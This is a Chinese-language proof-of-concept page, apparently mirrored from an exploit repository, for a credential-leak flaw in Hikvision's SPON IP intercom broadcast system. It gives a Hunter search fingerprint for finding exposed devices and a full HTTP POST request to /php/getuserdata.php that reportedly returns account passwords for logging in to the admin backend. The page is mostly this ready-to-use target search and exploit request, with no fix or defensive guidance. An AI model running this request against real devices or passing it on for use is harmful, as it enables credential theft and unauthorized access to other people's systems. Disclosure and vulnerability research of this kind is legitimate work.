mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-08 20:05:25 +00:00
37 lines
1.6 KiB
Markdown
37 lines
1.6 KiB
Markdown
|
|
# 海康威视SPON IP网络对讲广播系统getuserdata存在信息泄露漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
<font style="color:rgba(0, 0, 0, 0.9);">Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。海康威视SPON IP网络对讲广播系统getuserdata存在信息泄露漏洞,攻击者可通过该漏洞在服务器端读取账户密码,从而登录后台。</font>
|
|||
|
|
|
|||
|
|
# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
|
|||
|
|
+ 海康威视SPON IP网络对讲广播系统
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ Hunter:`web.body="vendors/custom/html5.min.js"`
|
|||
|
|
+ 特征
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```java
|
|||
|
|
POST /php/getuserdata.php HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
Cache-Control: max-age=0
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|||
|
|
Accept-Encoding: gzip, deflate, br
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|||
|
|
Connection: close
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 44
|
|||
|
|
|
|||
|
|
jsondata[pageIndex]=0&jsondata[pageCount]=30
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-02-29 23:57:17
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gb9bbzrsxkw7v8t7>
|